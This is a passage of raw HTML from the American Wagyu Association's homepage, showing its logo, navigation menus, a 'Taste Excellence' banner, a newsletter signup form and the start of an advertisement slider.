1.25l-.608.654c-.664-.63-1.407-1.082-2.478-1.082-1.745 0-3.051 1.42-3.051 3.233v.023c0 1.823 1.317 3.255 3.051 3.255 1.082 0 1.791-.418 2.546-1.138l.586.574c-.823.833-1.724 1.386-3.154 1.386-2.274 0-3.953-1.791-3.953-4.055m8.742 3.919h.89v-7.884h-.89zm8.312-2.894l-1.79-4.01-1.802 4.01h3.592zm-2.196-5.046h.834l3.592 7.94h-.957l-.923-2.083h-4.291l-.935 2.084h-.912l3.592-7.94zm7.054.879h-2.647v-.823h6.194v.823h-2.647v7.061h-.9zm5.294 7.061h.89v-7.884h-.89zm9.969-3.919v-.022c0-1.792-1.307-3.256-3.109-3.256-1.801 0-3.085 1.442-3.085 3.233v.023c0 1.79 1.306 3.255 3.108 3.255s3.086-1.442 3.086-3.233m-7.118 0v-.022c0-2.174 1.633-4.078 4.032-4.078s4.01 1.881 4.01 4.055v.023c0 2.173-1.634 4.077-4.033 4.077-2.398 0-4.009-1.881-4.009-4.055m9.925-3.965h.833l4.967 6.319v-6.319h.867v7.884h-.71l-5.09-6.465v6.465h-.867zM15.032 46.452c2.036-5.17 5.678-2.612 5.678-2.612 9.666 7.315 7.057 38.83 7.057 38.83l15.815-37.652h.98l12.99 37.652L71.93 45.018h1.085l-14.92 39.063h-1.03L44.073 46.429 28.2 84.08h-1.084c.761-39.82-8.614-39.211-8.614-39.211-1.583-.183-3.47 1.582-3.47 1.582"/><path d="M18.521 45.887c-.717-.24-1.889.417-2.794 1.309l-3.02 3.141 1.377-4.259c1.266-3.214 3.183-3.89 4.568-3.89 1.438 0 2.525.735 2.644.819 7.488 5.666 8.028 24.306 7.776 33.928L42.905 44h2.382l12.314 35.688L71.23 44h3.264L58.796 85.1h-2.458l-12.36-35.824L28.876 85.1h-2.798l.02-1.039c.716-37.464-7.493-38.17-7.577-38.174M12.16 14.282s-.936.263-3.104 1.282c0 0-7.662-4.717-2.693-15.417 0 0-1.589 8.274 5.796 14.135m12.153 5.206s-.354.406-1.943 2.95c0 0 9.63 3.008 18.176-1.834 0 0-12.804 1.71-16.233-1.116" fill="#FEFEFE" mask="url(#b)"/><path d="M48.194 26.188s-7.164 13.689 24.36.777c0 0 23.798-9.443 35.28.176-1.32-1.106 16.913 12.568-7.758 33.67 0 0 16.137-17.998 6.514-29.23 0 0-6.589-10.604-32.453-1.85 0 0-18.34 8.094-27.65 5.145 0 0-8.378-3.723 1.707-8.688" fill="#FEFEFE" mask="url(#b)"/><path fill="#FEFEFE" mask="url(#b)" d="M99.488 68.78L88.907 45.995 78.383 68.78l-.38.813-6.729 14.487h-1.14l18.013-39.063h1.519L107.68 84.08h-1.194l-6.674-14.487z"/><path fill="#FEFEFE" mask="url(#b)" d="M89.104 44h1.214l18.954 41.1h-3.438l-6.947-15.08-.345-.862-9.633-20.74-9.983 21.607L71.924 85.1h-3.38L87.496 44h1.21m49.737 21.56h5.773v13.963c-1.883 1.593-4.029 2.821-6.44 3.69-2.408.868-4.971 1.301-7.69 1.301-3.077 0-5.922-.533-8.53-1.6-2.607-1.067-4.854-2.576-6.738-4.53a20.293 20.293 0 01-4.182-6.24c-1.015-2.35-1.52-4.882-1.52-7.595 0-2.821.54-5.443 1.626-7.867a19.997 19.997 0 014.422-6.32c1.86-1.791 4.067-3.201 6.617-4.233 2.551-1.03 5.29-1.546 8.22-1.546 2.604 0 5.064.408 7.38 1.221a22.49 22.49 0 016.29 3.391l-.16 1.085a19.903 19.903 0 00-6.103-3.5c-2.261-.812-4.694-1.22-7.299-1.22-2.784 0-5.39.488-7.812 1.465-2.423.976-4.53 2.325-6.321 4.042a19.027 19.027 0 00-4.231 6.048c-1.03 2.316-1.547 4.811-1.547 7.488 0 2.677.506 5.174 1.52 7.486a18.356 18.356 0 004.205 6.023c1.79 1.701 3.896 3.04 6.32 4.016 2.422.976 5.028 1.465 7.813 1.465 2.529 0 4.91-.408 7.135-1.22 2.223-.816 4.203-1.962 5.94-3.446V66.618h-4.688"/><path d="M130.086 85.533c-3.2 0-6.199-.564-8.916-1.676-2.727-1.117-5.112-2.72-7.085-4.766a21.38 21.38 0 01-4.383-6.543c-1.066-2.463-1.605-5.155-1.605-8 0-2.956.577-5.743 1.716-8.283a21.083 21.083 0 014.645-6.637c1.945-1.872 4.28-3.366 6.941-4.443 2.661-1.075 5.555-1.62 8.602-1.62 2.706 0 5.303.43 7.717 1.278a23.616 23.616 0 016.575 3.545l.474.364-.514 3.479-1.396-1.17a19.01 19.01 0 00-5.795-3.322c-2.142-.77-4.481-1.16-6.953-1.16-2.642 0-5.142.467-7.43 1.39-2.291.924-4.308 2.213-5.998 3.833a18.096 18.096 0 00-4.007 5.729c-.966 2.175-1.457 4.555-1.457 7.072 0 2.526.483 4.908 1.434 7.078a17.435 17.435 0 003.973 5.693c1.69 1.605 3.708 2.886 6 3.81 2.291.922 4.791 1.39 7.432 1.39 2.399 0 4.682-.39 6.786-1.159a18.422 18.422 0 005.27-2.966V67.637h-3.668V64.54h6.79v15.455l-.36.305c-1.966 1.662-4.238 2.964-6.754 3.87-2.505.904-5.209 1.362-8.034 1.362m33.811-22.882v21.43h-1.083V62.65l-14.65-17.632h1.302l13.888 16.71 13.943-16.71h1.25z" fill="#FEFEFE" mask="url(#b)"/><path fill="#FEFEFE" mask="url(#b)" d="M164.916 85.1h-3.12V63.017l-15.803-19.019h3.95l13.414 16.137L176.82 44h3.897l-15.801 19.019zm52.439-9.944a14.992 14.992 0 01-3.234 4.8c-1.45 1.411-3.17 2.524-5.163 3.337-1.992.816-4.131 1.221-6.414 1.221-2.39 0-4.59-.424-6.603-1.274a15.922 15.922 0 01-5.244-3.553 15.46 15.46 0 01-3.07-4.72c-.745-1.773-1.115-3.69-1.115-5.753V45.018h1.088v24.196c0 2.026.387 3.917 1.166 5.671a14.19 14.19 0 003.173 4.557c1.337 1.284 2.91 2.297 4.72 3.038 1.808.742 3.761 1.113 5.859 1.113 2.096 0 4.059-.371 5.887-1.113 1.827-.74 3.408-1.754 4.747-3.038a13.874 13.874 0 003.145-4.557c.762-1.754 1.142-3.645 1.142-5.67V45.017h1.084v24.196c0 2.136-.39 4.116-1.168 5.942"/><path d="M202.544 85.533c-2.515 0-4.87-.456-7-1.355a16.978 16.978 0 01-5.576-3.78 16.596 16.596 0 01-3.281-5.04c-.792-1.884-1.193-3.953-1.193-6.144V44h3.124v25.214c0 1.876.362 3.646 1.078 5.257a13.25 13.25 0 002.948 4.236c1.24 1.19 2.72 2.144 4.4 2.83 1.678.689 3.519 1.038 5.474 1.038 1.954 0 3.806-.35 5.505-1.04 1.695-.686 3.184-1.638 4.423-2.828a12.921 12.921 0 002.916-4.226c.703-1.616 1.059-3.388 1.059-5.267V44h3.12v25.214c0 2.26-.42 4.394-1.25 6.34a16.08 16.08 0 01-3.452 5.125c-1.549 1.506-3.396 2.7-5.496 3.557-2.104.86-4.39 1.297-6.799 1.297M91.547 70.776a2.802 2.802 0 11-5.603 0 2.802 2.802 0 015.603 0" fill="#FEFEFE" mask="url(#b)"/><path d="M88.746 68.993c-.983 0-1.782.8-1.782 1.783 0 .983.8 1.783 1.782 1.783.983 0 1.783-.8 1.783-1.783 0-.983-.8-1.783-1.783-1.783m0 5.603a3.823 3.823 0 01-3.819-3.82 3.824 3.824 0 013.82-3.82 3.824 3.824 0 013.819 3.82 3.823 3.823 0 01-3.82 3.82M10.779 16.645s-5.457.557-6.793 5.235c0 0-1.282 3.898.5 6.626 0 0 .613.668-.11 2.228 0 0-7.463 14.256-2.897 17.82 0 0 5.847 5.178 14.368-7.908 0 0-7.908 8.465-12.641 5.513 0 0-3.286-.835 3.118-13.254 0 0 2.45-4.565 0-6.849 0 0-3.063-3.286 4.455-9.41" fill="#FEFEFE" mask="url(#b)"/></g></g></svg></a>
 </span>

 <li class="has-children" >
 <a class="carrot" href="/company">About</a>
 <a href="#" class="toggle child" style="border: none;"
 aria-label="Toggle Child Menu"><svg width="21" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512">
	<path d="M441.9 167.3l-19.8-19.8c-4.7-4.7-12.3-4.7-17 0L224 328.2 42.9 147.5c-4.7-4.7-12.3-4.7-17 0L6.1 167.3c-4.7 4.7-4.7 12.3 0 17l209.4 209.4c4.7 4.7 12.3 4.7 17 0l209.4-209.4c4.7-4.7 4.7-12.3 0-17z"/>
</svg></a>

 <div class="child-menu">
 <div class="wrapper">
 <div class="inner">
 <ul style="column-count: 2">
 <li>
 <a href="/company/american-wagyu-heritage-fund-inc">American Wagyu Heritage Fund, Inc.</a>
 </li>
 <li>
 <a href="/company/membership-application">Become a Member</a>
 </li>
 <li>
 <a href="/company/bylaws-and-rules">Bylaws and Rules</a>
 </li>
 <li>
 <a href="/company/member-awards">Member Awards</a>
 </li>
 <li>
 <a href="/company/careers-and-internships">Careers and Internships</a>
 </li>
 <li>
 <a href="/company/faqs">FAQs</a>
 </li>
 <li>
 <a href="/company/advertise-with-the-awa">Fee Schedule / Media Guide</a>
 </li>
 <li>
 <a href="/company/strategic-plan">Strategic Plan</a>
 </li>
 <li>
 <a href="/company/staff-board">Staff &; Board</a>
 </li>
 <li>
 <a href="https://worldwagyucouncil.com/"
 target="_blank">World Wagyu Council</a>
 </li>
 <li>
 <a href="/company/association-competitions">Association Competitions</a>
 </li>
 </ul>
 <div class="featured-content">
 <div class="row">
 
 <div class="image">
 	<picture class="aspect widescreen">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/59945/Untitled4.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/59945/Untitled4.webp 640w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/Untitled4.png 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/Untitled4.png 640w,
		" type="image/png" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_460x250_crop_center-center_none/Untitled4.png" width="460" height="250" alt="Untitled4" loading="lazy" />
		
	</picture>


 </div>
 <div class="content">
 <p>Upcoming Events of the American Wagyu Association</p>
 </div>
 
 </div>
 </div>
 </div>
 
 <div class="featured-event">
 <div class="event-info">
 <header class="title">2025 AGM &; Conference!</header>
 <div class="location">Sep 18
 - Sep 21
 @ 11:34 pm MDT
 </div>
 </div>
 <div class="btn-container">
 <a class="rd-button" href="https://wagyu.org/events/2025-agm-conference"
 target="">Read More!</a>
 </div>
 </div>
 </div>
 </div>
 </li>
 <li class="has-children" >
 <a class="carrot" href="/events">Events</a>
 <a href="#" class="toggle child" style="border: none;"
 aria-label="Toggle Child Menu"><svg width="21" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512">
	<path d="M441.9 167.3l-19.8-19.8c-4.7-4.7-12.3-4.7-17 0L224 328.2 42.9 147.5c-4.7-4.7-12.3-4.7-17 0L6.1 167.3c-4.7 4.7-4.7 12.3 0 17l209.4 209.4c4.7 4.7 12.3 4.7 17 0l209.4-209.4c4.7-4.7 4.7-12.3 0-17z"/>
</svg></a>

 <div class="child-menu">
 <div class="wrapper">
 <div class="inner">
 <ul style="column-count: 1">
 <li>
 <a href="/events/2025-agm-conference">2025 Annual General Meeting &; Conference</a>
 </li>
 <li>
 <a href="/events/the-best-wagyu-steak-in-america-2025">The Best Wagyu Steak in America- 2025</a>
 </li>
 <li>
 <a href="/events/2025-post-conference-tour">2025 Post Conference Tour</a>
 </li>
 <li>
 <a href="/events/2024-american-wagyu-agm-and-conference">2024 American Wagyu Association AGM &; Conference</a>
 </li>
 <li>
 <a href="/events/2024-agm-and-conference-video-series">2024 AGM and Conference Video Series</a>
 </li>
 <li>
 <a href="/events/2023-agm-and-conference-video-series">2023 AGM and Conference Video Series</a>
 </li>
 <li>
 <a href="/events/livestock-shows-and-industry-events">Industry Events</a>
 </li>
 <li>
 <a href="/events/awa-member-events-auctions">Member Events &; Auctions</a>
 </li>
 </ul>
 <div class="featured-content">
 <a href="https://wagyu.org/events/awa-member-events-auctions" class="row">
 
 <div class="image">
 	<picture class="aspect widescreen">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/59307/AWA-2014-JAMES-BEARD-DINNER-113.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/59307/AWA-2014-JAMES-BEARD-DINNER-113.webp 640w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/AWA-2014-JAMES-BEARD-DINNER-113.jpg 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/AWA-2014-JAMES-BEARD-DINNER-113.jpg 640w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_460x250_crop_center-center_none/AWA-2014-JAMES-BEARD-DINNER-113.jpg" width="460" height="250" alt="AWA 2014 JAMES BEARD DINNER 113" loading="lazy" />
		
	</picture>


 </div>
 <div class="content">
 <p>Check out our upcoming sales!</p>
 </div>
 
 </a>
 </div>
 </div>
 
 <div class="featured-event">
 <div class="event-info">
 <header class="title">2025 AGM &; Conference!</header>
 <div class="location">Sep 18
 - Sep 21
 @ 11:34 pm MDT
 </div>
 </div>
 <div class="btn-container">
 <a class="rd-button" href="https://wagyu.org/events/2025-agm-conference"
 target="">Read More!</a>
 </div>
 </div>
 </div>
 </div>
 </li>
 <li class="has-children" >
 <a class="carrot" href="/news">News/Promotion</a>
 <a href="#" class="toggle child" style="border: none;"
 aria-label="Toggle Child Menu"><svg width="21" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512">
	<path d="M441.9 167.3l-19.8-19.8c-4.7-4.7-12.3-4.7-17 0L224 328.2 42.9 147.5c-4.7-4.7-12.3-4.7-17 0L6.1 167.3c-4.7 4.7-4.7 12.3 0 17l209.4 209.4c4.7 4.7 12.3 4.7 17 0l209.4-209.4c4.7-4.7 4.7-12.3 0-17z"/>
</svg></a>

 <div class="child-menu">
 <div class="wrapper">
 <div class="inner">
 <ul style="column-count: 1">
 <li>
 <a href="/news/where-to-buy">Premium Advertisers</a>
 </li>
 <li>
 <a href="https://wagyu.org/for-producers/view-classified-ads"
 target="">View Classified Ads</a>
 </li>
 <li>
 <a href="/news/advertising-services">Advertising Services</a>
 </li>
 <li>
 <a href="/news/news-releases">News Releases</a>
 </li>
 <li>
 <a href="/news/newsletter">Newsletter</a>
 </li>
 <li>
 <a href="https://wagyu.org/for-consumers/2024awa-publications"
 target="">Publications</a>
 </li>
 <li>
 <a href="/news/wagyu-world">Wagyu World</a>
 </li>
 <li>
 <a href="https://wagyu.org/for-consumers/request-newsletter"
 target="">Request Newsletter</a>
 </li>
 </ul>
 <div class="featured-content">
 <a href="https://wagyu.org/news/news-releases" class="row">
 
 <div class="image">
 	<picture class="aspect widescreen">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/59922/Untitled3.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/59922/Untitled3.webp 640w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/Untitled3.png 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/Untitled3.png 640w,
		" type="image/png" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_460x250_crop_center-center_none/Untitled3.png" width="460" height="250" alt="Untitled3" loading="lazy" />
		
	</picture>


 </div>
 <div class="content">
 <p>Meeting Consumers Expectations</p>
 </div>
 
 </a>
 </div>
 </div>
 
 <div class="featured-event">
 <div class="event-info">
 <header class="title">2025 AGM &; Conference!</header>
 <div class="location">Sep 18
 - Sep 21
 @ 11:34 pm MDT
 </div>
 </div>
 <div class="btn-container">
 <a class="rd-button" href="https://wagyu.org/events/2025-agm-conference"
 target="">Read More!</a>
 </div>
 </div>
 </div>
 </div>
 </li>
 <li>
 <a class="carrot" href="/contact">Contact</a>
 </li>
 <li><a href="#" class="search-icon toggle-search"><svg width="17" height="17" viewBox="0 0 17 17" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M6.837 12.674a5.735 5.735 0 003.727-1.359l4.53 4.53a.52.52 0 00.376.155.532.532 0 00.375-.906l-4.53-4.53a5.83 5.83 0 001.359-3.727A5.838 5.838 0 006.837 1C3.627 1 1 3.627 1 6.837a5.846 5.846 0 005.837 5.837zm.11-10.64a4.92 4.92 0 014.915 4.914 4.911 4.911 0 01-4.914 4.914 4.92 4.92 0 01-4.914-4.914 4.927 4.927 0 014.914-4.914z" fill="#FFF" stroke="#FFF" fill-rule="evenodd"/></svg></a></li>
 <li class="sign-ins-mobile"><a href="https://wagyu.digitalbeef.com/"
 target="_blank"><svg width="12" height="15" viewBox="0 0 12 15" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M9.844 5.625h-.469V3.75A3.754 3.754 0 005.625 0a3.754 3.754 0 00-3.75 3.75v1.875h-.469C.631 5.625 0 6.255 0 7.031v6.563C0 14.369.631 15 1.406 15h8.438c.775 0 1.406-.63 1.406-1.406V7.03c0-.775-.631-1.406-1.406-1.406zM3.125 3.75c0-1.379 1.121-2.5 2.5-2.5s2.5 1.121 2.5 2.5v1.875h-5V3.75zm3.125 6.701v1.424a.625.625 0 11-1.25 0v-1.424a1.246 1.246 0 01.625-2.326 1.246 1.246 0 01.625 2.326z" stroke="#000"/></svg>DigitalBeef Sign In</a></li>
 <li class="sign-ins-mobile"><a href="/member-sign-in"><svg width="12" height="15" viewBox="0 0 12 15" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M9.844 5.625h-.469V3.75A3.754 3.754 0 005.625 0a3.754 3.754 0 00-3.75 3.75v1.875h-.469C.631 5.625 0 6.255 0 7.031v6.563C0 14.369.631 15 1.406 15h8.438c.775 0 1.406-.63 1.406-1.406V7.03c0-.775-.631-1.406-1.406-1.406zM3.125 3.75c0-1.379 1.121-2.5 2.5-2.5s2.5 1.121 2.5 2.5v1.875h-5V3.75zm3.125 6.701v1.424a.625.625 0 11-1.25 0v-1.424a1.246 1.246 0 01.625-2.326 1.246 1.246 0 01.625 2.326z" stroke="#000"/></svg>
 Members Only</a>
 </li>
 </ul>
</div>
				</nav>
			</header>
			
			<form action="/search" method="get" class="site-search" id="site-search">
	<input type="search" name="keywords" placeholder="What are you looking for?" value="" aria-label="Search American Wagyu Association"/>
	<div class="delete" aria-label="Close site search"><svg width="30" height="30" viewBox="0 0 30 30" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M28.93 5.898l-9.072 9.073 9.073 9.073a3.455 3.455 0 01-4.885 4.887l-9.075-9.074-9.073 9.074a3.444 3.444 0 01-2.443 1.012 3.455 3.455 0 01-2.442-5.899l9.072-9.073-9.073-9.073A3.455 3.455 0 015.897 1.01l9.074 9.074 9.074-9.074a3.455 3.455 0 014.886 4.887z" fill="#B1B1B1"/></svg></div>
</form>
		
		<div id="skip-navigation"></div>

					
<header class="homepage-banner" style="position: relative">
				<picture class="">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_320xAUTO_crop_center-center_none/74682/oooollllddthreeeeeee.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_640xAUTO_crop_center-center_none/74682/oooollllddthreeeeeee.webp 640w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_960xAUTO_crop_center-center_none/74682/oooollllddthreeeeeee.webp 960w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_1280xAUTO_crop_center-center_none/74682/oooollllddthreeeeeee.webp 1280w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_1600xAUTO_crop_center-center_none/74682/oooollllddthreeeeeee.webp 1600w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_1920xAUTO_crop_center-center_none/74682/oooollllddthreeeeeee.webp 1920w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_2240xAUTO_crop_center-center_none/74682/oooollllddthreeeeeee.webp 2240w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_320xAUTO_crop_center-center_none/oooollllddthreeeeeee.jpg 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_640xAUTO_crop_center-center_none/oooollllddthreeeeeee.jpg 640w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_960xAUTO_crop_center-center_none/oooollllddthreeeeeee.jpg 960w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_1280xAUTO_crop_center-center_none/oooollllddthreeeeeee.jpg 1280w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_1600xAUTO_crop_center-center_none/oooollllddthreeeeeee.jpg 1600w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_1920xAUTO_crop_center-center_none/oooollllddthreeeeeee.jpg 1920w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_2240xAUTO_crop_center-center_none/oooollllddthreeeeeee.jpg 2240w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Banners/_2240xAUTO_crop_center-center_none/oooollllddthreeeeeee.jpg" width="2240" height="1113" alt="Oooollllddthreeeeeee" loading="lazy" />
		
	</picture>


		<div class="banner-text">
		<h1 class="right">Taste Excellence</h1>
		<p class="right">Wagyu, the finest beef in the world.</p>
	</div>
		<div class="banner-users">
			<div class="users">
																<a href="https://wagyu.digitalbeef.com/" target="_blank" class="user-single">
					<div class="color-fill">
					</div>
					<div class="spacer"></div>
					<div class="white-fill">
												<p>Search Breeders and Genetics</p>
						<svg width="25" height="17" viewBox="0 0 25 17" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M15.405 1.11l.824-.824a.887.887 0 011.258 0l7.216 7.212a.887.887 0 010 1.258l-7.216 7.217a.887.887 0 01-1.258 0l-.824-.825a.892.892 0 01.014-1.273l4.473-4.261H1.461a.889.889 0 01-.891-.89v-1.19c0-.493.397-.89.89-.89h18.432L15.42 2.382a.885.885 0 01-.014-1.273z" fill="#A71D35"/></svg>
					</div>
				</a>
												<a href="https://wagyu.org/for-consumers/where-to-buy-wagyu-beef" target="_blank" class="user-single">
					<div class="color-fill">
					</div>
					<div class="spacer"></div>
					<div class="white-fill">
												<p>Where to Buy Wagyu Beef</p>
						<svg width="25" height="17" viewBox="0 0 25 17" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M15.405 1.11l.824-.824a.887.887 0 011.258 0l7.216 7.212a.887.887 0 010 1.258l-7.216 7.217a.887.887 0 01-1.258 0l-.824-.825a.892.892 0 01.014-1.273l4.473-4.261H1.461a.889.889 0 01-.891-.89v-1.19c0-.493.397-.89.89-.89h18.432L15.42 2.382a.885.885 0 01-.014-1.273z" fill="#A71D35"/></svg>
					</div>
				</a>
												<a href="https://wagyu.org/company/membership-application" target="_blank" class="user-single">
					<div class="color-fill">
					</div>
					<div class="spacer"></div>
					<div class="white-fill">
												<p>Become a Member</p>
						<svg width="25" height="17" viewBox="0 0 25 17" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M15.405 1.11l.824-.824a.887.887 0 011.258 0l7.216 7.212a.887.887 0 010 1.258l-7.216 7.217a.887.887 0 01-1.258 0l-.824-.825a.892.892 0 01.014-1.273l4.473-4.261H1.461a.889.889 0 01-.891-.89v-1.19c0-.493.397-.89.89-.89h18.432L15.42 2.382a.885.885 0 01-.014-1.273z" fill="#A71D35"/></svg>
					</div>
				</a>
							</div>
		</div>
	</div>
</header>
		
							<div class="email-popup-container" id="email-popup">
				<div class="email-popup" id="email-inner">
					<div class="close" id="close"><svg width="24" height="24" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M11.77 10l7.864-7.865A1.25 1.25 0 0017.866.367L10 8.23 2.136.367a1.25 1.25 0 10-1.77 1.768L8.233 10 .366 17.864a1.252 1.252 0 001.77 1.77L10 11.769l7.866 7.865a1.248 1.248 0 001.768 0 1.252 1.252 0 000-1.77L11.769 10z" fill="#525252" fill-rule="evenodd"/></svg></div>
										
										
					<div class="email-popup-form" aria-label="Email Signup Form" role="img">
						<h2>Sign up to receive newsletters, events, and other helpful resources.</h2>
													
<form method="post" data-recaptcha="v2_checkbox" data-recaptcha-key="6LcmwTEkAAAAAGXbkTvxyv3boR58sLswUB6-ILcj" data-recaptcha-lazy-load data-freeform data-id="616f57-form-7Xg2aQ2bR-19BmKzG2E-0vWX2dT6UvOpyVfPzTflgOzOAyhKn5y5r6wmOQAd" data-handle="popupSignup" data-disable-submit data-auto-scroll data-success-message="Form has been submitted successfully!" data-error-message="Sorry, there was an error submitting the form. Please try again." >
<div class="freeform_form_handle" style="position: absolute !important; width: 0 !important; height: 0 !important; overflow: hidden !important;" aria-hidden="true" tabindex="-1"><label aria-hidden="true" tabindex="-1" for="freeform_form_handle">Leave this field blank</label><input type="text" value="" name="freeform_form_handle" id="freeform_form_handle" aria-hidden="true" autocomplete="off" tabindex="-1" /></div><input type="hidden" name="freeform_payload" value="4DsmOBIbE+3SFIQpR5fo2GNlZWI3MzcwNjhiOGRiODQyZjMyMDM3OWEzZDE0OWU4YzBkNTY0NWU4NjQ0YjNkYWEwZjY5ZmVkNTQzNDViZjA6VEFJI4wxY/irBHjXBgD1cFDeANdDeVkogk7SPwfyDIFXeCMM9Tc+w2GcUl/O2XfTrZd72SYQ2pKrjSulHwMxlzU4gPWdEXGFqVjipScGnzDW31QKnTyn9oWpj7nybU8bqpeUDn2CpIclC5qbQQNTzXInurbXSePAnY3PsqTppL49UYT1hDRkP+FqdpnXmBkh0LXxyC0FNyQsiLKVUoB6Xx6rwCO4Kki1skk3RKHPXDMMZ1/hQ4K+kame/BvJHEsnFjd8V+Sil6D+DF11HAdI/AbZVBU7vWzRYkQb4ToPyzb3PmtpapW/+7M/AxbW4A1loLoJUGYWFahVgYTxU6H7r0z4iQrh+LvFkO5uEMWrbQ==" />
<input type="hidden" name="formHash" value="7Xg2aQ2bR-19BmKzG2E-0vWX2dT6UvOpyVfPzTflgOzOAyhKn5y5r6wmOQAd" />
<input type="hidden" name="action" value="freeform/submit" />
<input type="hidden" name="CRAFT_CSRF_TOKEN" value="HIvMnbWlemJS16Nc41ssY1ZlAB3Sb0A-Jj56_Iw1zyusblWTkYchgSnK-siF8QxSM4foG7sqTjkOLkxvnzo0cFdcLrfcUp8SxQoFzOP0RvU=" />
<input type="hidden" name="freeform-action" value="submit" />
<div id="616f57-form-7Xg2aQ2bR-19BmKzG2E-0vWX2dT6UvOpyVfPzTflgOzOAyhKn5y5r6wmOQAd" data-scroll-anchor style="display: none;"></div>

<script>
 var form = document.querySelector('[data-id="616f57-form-7Xg2aQ2bR-19BmKzG2E-0vWX2dT6UvOpyVfPzTflgOzOAyhKn5y5r6wmOQAd"]');
 if (form) {
 form.addEventListener("freeform-stripe-styling", function (event) {
 event.detail.base = {
 fontSize: "16px",
 fontFamily: "-apple-system,BlinkMacSystemFont,\"Segoe UI\",Roboto,\"Helvetica Neue\",Arial,sans-serif,\"Apple Color Emoji\",\"Segoe UI Emoji\",\"Segoe UI Symbol\",\"Noto Color Emoji\"",
 }
 })
 }
</script>




<div class="freeform-row ">
 <div class="freeform-column ">
 <label for="form-input-email" class="freeform-label freeform-required">Email</label>
<input class="freeform-input" name="email" type="email" id="form-input-email" data-required/>

 
 </div>
 </div>
<div class="freeform-row ">
 <div class="freeform-column ">
 <label for="form-input-fullName" class="freeform-label freeform-required">Full Name</label>
<input class="freeform-input " name="fullName" type="text" id="form-input-fullName" data-required/>

 
 </div>
 </div>
<div class="freeform-row ">
 <div class="freeform-column ">
 <label for="form-input-zipCode" class="freeform-label freeform-required">Zip Code</label>
<input class="freeform-input " name="zipCode" type="text" id="form-input-zipCode" data-required/>

 
 </div>
 </div>
<div class="freeform-row ">
 <div class="freeform-column ">
 <label for="form-input-phoneNumber" class="freeform-label freeform-required">Phone Number</label>
<input class="freeform-input " name="phoneNumber" type="text" id="form-input-phoneNumber" data-required/>

 
 </div>
 </div>
<div class="freeform-row ">
 <div class="freeform-column ">
 <div class="g-recaptcha" data-sitekey="6LcmwTEkAAAAAGXbkTvxyv3boR58sLswUB6-ILcj" data-theme="light" data-size="normal" ></div><input type="hidden" name="grecaptcha_lMB87MaaM" />

 
 </div>
 </div>
<div class="freeform-row ">
 <div class="freeform-column freeform-column-content-align-left">
 <button class data-freeform-action="submit" type="submit" name="form_page_submit">Submit</button>

 
 </div>
 </div>

<script src="https://wagyu.org/freeform/plugin.js?v=735a20b8ff215e4aff024049232954906fe0b87d"></script></form>

											</div>
				</div>
			</div>
				

		<div class="container">
			<main id="main-content">
									<article>
					
				<section class="block advertisement-slider">
	<div class="advertisement-slider-wrapper">
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/JHLivestock-logo.jpg" width="905" height="569" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(69552, 'https://jandhlivestock.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
